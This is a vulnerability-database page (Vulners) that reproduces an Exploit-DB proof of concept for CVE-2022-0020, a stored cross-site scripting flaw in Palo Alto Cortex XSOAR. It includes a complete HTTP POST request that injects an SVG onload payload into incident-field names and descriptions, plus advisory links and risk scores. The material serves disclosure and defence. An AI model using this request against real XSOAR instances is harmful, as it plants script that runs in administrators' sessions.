Vulners
Lucene search
Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting Vulnerability
| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
 | CVE-2022-0020 | 10 Feb 202220:17 | – | circl |
 | Palo Alto Network Cortex XSOAR 跨站脚本漏洞 | 9 Feb 202200:00 | – | cnnvd |
 | CVE-2022-0020 | 10 Feb 202218:10 | – | cve |
 | CVE-2022-0020 Cortex XSOAR: Stored Cross-Site Scripting (XSS) Vulnerability in Web Interface | 10 Feb 202218:10 | – | cvelist |
 | Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS) | 8 Apr 202300:00 | – | exploitdb |
 | EUVD-2022-15241 | 3 Oct 202520:07 | – | euvd |
 | CVE-2022-0020 | 10 Feb 202218:15 | – | nvd |
 | CVE-2022-0020 | 10 Feb 202218:15 | – | osv |
 | Cortex XSOAR: Stored Cross-Site Scripting (XSS) Vulnerability in Web Interface | 9 Feb 202217:00 | – | paloalto |
 | Palo Alto Cortex XSOAR 6.5.0 Cross Site Scripting | 10 Apr 202300:00 | – | packetstorm |
10
# Exploit Title: Palo Alto Cortex XSOAR 6.5.0 - Stored Cross-Site Scripting (XSS)
# Exploit Author: omurugur
# Vendor Homepage: https://security.paloaltonetworks.com/CVE-2022-0020
# Version: 6.5.0 - 6.2.0 - 6.1.0
# Tested on: [relevant os]
# CVE : CVE-2022-0020
# Author Web: https://www.justsecnow.com
# Author Social: @omurugurrr
A stored cross-site scripting (XSS) vulnerability in Palo Alto Network
Cortex XSOAR web interface enables an authenticated network-based attacker
to store a persistent javascript payload that will perform arbitrary
actions in the Cortex XSOAR web interface on behalf of authenticated
administrators who encounter the payload during normal operations.
POST /acc_UAB(MAY)/incidentfield HTTP/1.1
Host: x.x.x.x
Cookie: XSRF-TOKEN=xI=; inc-term=x=; S=x+x+x+x/x==; S-Expiration=x;
isTimLicense=false
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0)
Gecko/20100101 Firefox/94.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://x.x.x.x/acc_UAB(MAY)
Content-Type: application/json
X-Xsrf-Token:
Api_truncate_results: true
Origin: https://x.x.x.x
Content-Length: 373
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
{"associatedToAll":true,"caseInsensitive":true,"sla":0,"shouldCommit":true,"threshold":72,"propagationLabels":["all"],"name":"\"/><svg/onload=prompt(document.domain)>","editForm":true,"commitMessage":"Field
edited","type":"html","unsearchable":false,"breachScript":"","shouldPublish":true,"description":"\"/><svg/onload=prompt(document.domain)>","group":0,"required":false}
Regards,
Omur UGUR
>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Apr 2023 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 23.5
CVSS 3.15.4 - 6.8
EPSS0.00999